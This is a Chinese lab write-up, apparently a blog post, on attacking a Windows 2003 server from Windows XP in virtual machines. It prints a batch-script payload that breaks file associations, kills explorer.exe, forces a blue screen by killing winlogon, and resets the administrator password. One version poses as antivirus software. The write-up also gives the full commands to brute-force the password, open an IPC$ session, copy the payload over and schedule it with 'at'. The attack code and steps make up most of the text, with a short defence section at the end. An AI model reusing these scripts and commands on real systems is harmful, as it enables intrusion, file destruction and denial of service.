针对win2003服务器的恶意代码攻击
针对win2003服务器的恶意代码攻击
目录
- 针对win2003服务器的恶意代码攻击
- 实验环境
- 恶意代码语言构建与解释:
- 关键命令语句解释:
- 交互式:
- 非交互式:
- 实验过程:
- #配置网段和IP,使其相互ping通
- 使用ntscan扫描以及暴力破解服务器账户与密码
- 将恶意代码植入2003服务器
- 控制目标主机自动运行恶意代码
- 退出登录,攻击结束
- 漏洞分析与防御
- IPC$
- 密码设置
- 管理员权限
摘要:
再本次实验中,利用批处理语言写出一个简单的脚本恶意代码,按照功能与使用场景不同,分成了交互时和非交互式两个版本,交互式版本可以伪装成杀毒软件,诱导Windows2003服务器管理者运行.非交互式可以通过客户机windowsXP进行远程攻击Windows2003服务器,过程如下:
1.配置网段与IPIPIP地址,使其相互pingpingping通
2.利用445端口漏洞,XP通过ntscan工具对2003进行扫描端口以及管理员密码暴力破解.
3.根据得到的管理员帐号和密码通过XP命令行命令与目标主机2003建立IPC$
4.将恶意代码植入目标主机2003
5.通过net\ time等指令远程控制目标主机2003定时运行恶意代码.
6.运行结束,删除日志,退出登录
最后,总结了本次攻击过程中利用的漏洞,以及给出了防御方法与建议.
实验环境
所有实验过程在Vmware虚拟机进行,使用两个操作统,Windows2003作为服务器,为被攻击方.WindowsXP为客户机,为攻击方.操作系统信息如下:
2003
xp
恶意代码语言构建与解释:
关键命令语句解释:
`//注意:由于批处理语句在latex环境中识别错误,//所以为方便注释,将原本正确的注释格式::改成了C语言注释格式//
assoc .txt=exefile>nul //将系统中所有.txt后缀文件改成exefile,同时隐藏输出
assoc .exe=txtfile>nul//将系统中所有.exe后缀文件改成txtfile,同时隐藏输出
assoc .jpg=exefile>nul//将系统中所有.jpg后缀文件改成exefile,同时隐藏输出
ping -n 2 127.0.0.1>nul//利用ping命令,起到延时作用,同时隐藏输出
set /p num=输入密码是: //用户输入密码,同时赋值到num变量中
if "%num%"=="123" goto case1 //条件判断,进行跳转
if not "%num%"=="123" goto case2:case1 //跳转语句入口
assoc .txt=txtfile>nul //进行修复
assoc .exe=exefile>nul
assoc .jpg=jpgfile>nul
taskkill /im explorer.exe /f >nul 2>nul //强制杀死explorer进程,导致桌面系统瘫痪
ntsd -c q -pn winlogon.exe //蓝屏炸弹语句,
//会强制杀死winlogon进程,使系统重启,同时出现蓝屏`
交互式:
为了隐藏代码文件,将bat文件转换成exe程序,运行时结果如下:
文件破坏:
输入密码正确后,文件修复,自动退出
密码输入错误后,锁住桌面系统,启动蓝屏炸弹:
非交互式:
bat关键代码及其解释如下:
assoc .txt=exefile>nul //将系统中所有.txt后缀文件改成exefile,同时隐藏输出
assoc .exe=txtfile>nul//将系统中所有.exe后缀文件改成txtfile,同时隐藏输出
assoc .jpg=exefile>nul//将系统中所有.jpg后缀文件改成exefile,同时隐藏输出
net user administrator 123//修改服务器开机密码.
taskkill /im explorer.exe /f >nul 2>nul //强制杀死explorer进程,导致桌面系统瘫痪
ntsd -c q -pn winlogon.exe //蓝屏炸弹语句,会强制杀死winlogon进程,使系统重启,同时出现蓝屏
实验过程:
#配置网段和IP,使其相互ping通
使用Vmnet2网段
P配置
Windows2003配置为10.1.1.3:
XP配置为10.1.1.1
- 相互ping
使用ntscan扫描以及暴力破解服务器账户与密码
根据用户习惯设置密码字典
根据用户习惯设置账户名字典
利用IPC$端口开启暴力破解
将恶意代码植入2003服务器
- 登录服务器
net use \\10.1.1.3\ipc$ abc /user:administrator
- 植入代码到目标主机的C盘目录
copy d:Non_interactive.exe \\10.1.1.3\c$
- Windows2003:
- XP:
控制目标主机自动运行恶意代码
net time//返回目标主机时间at \\10.1.1.3 XXX c:\Non_interactive.exe//XXX需要填入运行时间,一般比目标主机时间多5分钟at \\10.1.1.3//察看2003运行进程计划表
XP:
2003:
利用修改后的新密码123登陆后,文件已经被破坏:
退出登录,攻击结束
此步骤需要在运行恶意代码之前进行,否则会出现恶意代码运行后,密码改变,无法多用户访问服务器的情况.
net use \\10.1.1.3\ipc$ /delte //退出登录
漏洞分析与防御
共有三个漏洞与相应建议:
IPC$
通过netstat−annetstat\ -annetstat −an以及netsharenet\ sharenet share可以查看IPC$ 状态,本次攻击利用了445端口开放的漏洞,所以一般情况下,我们需要关闭此端口,以抵御端口扫描与暴力破解.检查与抵御过程如下:
查看IPC$服务,发现已开启,故有漏洞:
关闭此服务:
再次查看,发现已经关闭:
密码设置
管理员密码设计过于简单,应该避开常用密码,尽量使用3/4准则设计密码.
管理员权限
对网络上的运行程序,运行前要慎重,有条件的话,可以运用一些工具查看以下脚本语言,再运行,尽量不要轻易使用管理员权限运行程序.
参考博客:
批处理语言基础
恶意代码参考
远程控制命令
ntscan资源 提取码:qphj
真空密码生成器提取码:c01y
针对win2003服务器的恶意代码攻击相关推荐
- [系统安全] 三十一.恶意代码检测(1)恶意代码攻击溯源及恶意样本分析
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- FBI针对Tor网络的恶意代码分析
一.背景 Tor(The Oninon Router)提供一个匿名交流网络平台,它使得用户在浏览网页或访问其它网络服务时不会被跟踪.作为该网络的一部分即所谓的"暗网"(darkne ...
- 阿里云服务器被恶意ddos攻击了怎么办?
服务器被DDoS攻击最恶心,尤其是阿里云的服务器受攻击最频繁,因为黑客都知道阿里云服务器防御低,一但被攻击就会进入黑洞清洗,轻的IP停止半小时,重的停两个至24小时,给网站带来很严重的损失. 处理 d ...
- [网络安全提高篇] 一一五.Powershell恶意代码检测 (3)Token关键词自动提取
"网络安全提高班"新的100篇文章即将开启,包括Web渗透.内网渗透.靶场搭建.CVE复现.攻击溯源.实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史.换专业确实挺难 ...
- 网安--第七章 恶意代码分析与防治
第7章 恶意代码分析与防治 内容提要 ◎ 恶意代码的发展史和恶意代码长期存在的原因 ◎ 恶意代码实现机理.定义以及攻击方法 ◎ 恶意代码生存技术.隐藏技术,介绍网络蠕虫的定义以及结构 ◎ 恶意代码防范 ...
- 安全防御 --- 恶意代码、防病毒
一.恶意代码 1.按照传播方式分类 (1)病毒 概念: 病毒是一种基于硬件和操作系统的程序,具有感染和破坏能力,这与病毒程序的结构有关.病毒攻击的宿主程序是病毒的栖身地,它是病毒传播的目的地,又是下一 ...
- [当人工智能遇上安全] 5.基于机器学习算法的主机恶意代码识别研究
您或许知道,作者后续分享网络安全的文章会越来越少.但如果您想学习人工智能和安全结合的应用,您就有福利了,作者将重新打造一个<当人工智能遇上安全>系列博客,详细介绍人工智能与安全相关的论文. ...
- [系统安全] 三十三.恶意代码检测(3)基于机器学习的恶意代码检测技术
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- MS08067 第一期 “恶意代码分析”实战班 正式开班~
文章来源|MS08067安全实验室 恶意代码分析实战班 恶意代码分析的分类: 恶意代码分析也可作为单独的安全专业类别来看待,不过总体是偏逆向方向的,希望的受众是逆向相关的就行了,比如以前只会逆向但是不 ...
- 恶意代码可视化检测技术研究综述
摘要 随着反检测技术的不断发展,产生了大量形态多样的恶意代码变种,传统检测技术已无法准确检测出该种未知恶意代码.由于数据可视化方法能将恶意代码的核心表现在图像特征中,因此可视化恶意代码检测方法受到越来 ...
最新文章
- 选择排序-直接选择排序
- [20160223]检查redo日志的完整性.txt
- 【机器视觉】 read_measure算子
- Jquery$和$$的区别
- 根据数据库表gengxin实体类_ASP.NET开发实战——(十二)数据库之EF Migrations
- LeetCode 1151. 最少交换次数来组合所有的 1(滑动窗口)
- 【伙伴故事】一盏智能灯,点亮家庭和工业照明的新未来
- idea超炫的自定义模板
- 使用cookies查询商品详情
- 如何花式计算20的阶乘?
- group by调优的一些测试
- 德国外交部为何放弃Linux而改用XP?
- CSS如何进行图片定位
- 笔记本无线热点共享批处理bat_马立杰_新浪博客
- 关于压缩感知的第一篇论文解析压缩感知研究新思路
- 关于PCM音频重采样思路及注意事项(频率变换和通道数变换(单通道转双通道))
- uniapp vue3版本 引用color-ui的cu-custom组件问题
- AI 新技术革命将如何重塑就业和全球化格局?深度解读 UN 报告(中篇)
- python整钱兑换零钱_LeetCode 零钱兑换
- 人为什么要活着——读《活着》有感